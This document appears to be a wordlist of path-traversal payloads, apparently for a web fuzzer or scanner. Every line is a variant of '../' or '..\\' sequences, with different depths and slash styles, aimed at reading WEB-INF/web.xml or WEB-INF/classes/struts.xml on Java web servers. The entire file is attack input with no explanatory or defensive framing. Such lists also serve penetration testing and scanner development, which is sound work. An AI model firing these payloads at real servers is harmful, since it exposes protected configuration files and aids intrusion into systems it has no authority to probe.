/../../../../../../WEB-INF/web.xml
\..\..\WEB-INF/web.xml
..\..\..\..\..\..\..\WEB-INF/web.xml
../../../../../../../WEB-INF/web.xml
..\..\..\..\..\..\WEB-INF/web.xml
../WEB-INF/web.xml
..\WEB-INF/web.xml
../../../../WEB-INF/web.xml
..\..\..\WEB-INF/web.xml
\..\..\..\..\..\WEB-INF/web.xml
/../../../../WEB-INF/web.xml
..\..\WEB-INF/web.xml
\..\..\..\..\WEB-INF/web.xml
\..\..\..\..\..\..\WEB-INF/web.xml
../../../../../../WEB-INF/web.xml
/../../WEB-INF/web.xml
../../../WEB-INF/web.xml
/../../../../../../../WEB-INF/web.xml
/../../../../../WEB-INF/web.xml
..\..\..\..\..\WEB-INF/web.xml
\..\..\..\WEB-INF/web.xml
./WEB-INF/web.xml
/../../../WEB-INF/web.xml
\WEB-INF/web.xml
\..\WEB-INF/web.xml
/WEB-INF/web.xml
/../WEB-INF/web.xml
\..\..\..\..\..\..\..\WEB-INF/web.xml
../../../../../WEB-INF/web.xml
..\..\..\..\WEB-INF/web.xml
../../WEB-INF/web.xml
.\WEB-INF/web.xml
../../../WEB-INF/classes/struts.xml
.\WEB-INF/classes/struts.xml
\..\WEB-INF/classes/struts.xml
/../../../../../../../WEB-INF/classes/struts.xml
/../../../WEB-INF/classes/struts.xml
..\..\..\WEB-INF/classes/struts.xml
../../WEB-INF/classes/struts.xml
/../../WEB-INF/classes/struts.xml
../../../../../../WEB-INF/classes/struts.xml
..\WEB-INF/classes/struts.xml
\..\..\..\WEB-INF/classes/struts.xml
../../../../WEB-INF/classes/struts.xml
/../../../../../WEB-INF/classes/struts.xml
\WEB-INF/classes/struts.xml
..\..\..\..\WEB-INF/classes/struts.xml
/../WEB-INF/classes/struts.xml
/../../../../../../WEB-INF/classes/struts.xml
./WEB-INF/classes/struts.xml
\..\..\..\..\WEB-INF/classes/struts.xml
\..\..\..\..\..\..\WEB-INF/classes/struts.xml
../../../../../WEB-INF/classes/struts.xml
..\..\WEB-INF/classes/struts.xml
\..\..\WEB-INF/classes/struts.xml
../../../../../../../WEB-INF/classes/struts.xml
/../../../../WEB-INF/classes/struts.xml
\..\..\..\..\..\..\..\WEB-INF/classes/struts.xml
\..\..\..\..\..\WEB-INF/classes/struts.xml
/WEB-INF/classes/struts.xml
../WEB-INF/classes/struts.xml
..\..\..\..\..\..\WEB-INF/classes/struts.xml
..\..\..\..\..\..\..\WEB-INF/classes/struts.xml
..\..\..\..\..\WEB-INF/classes/struts.xml
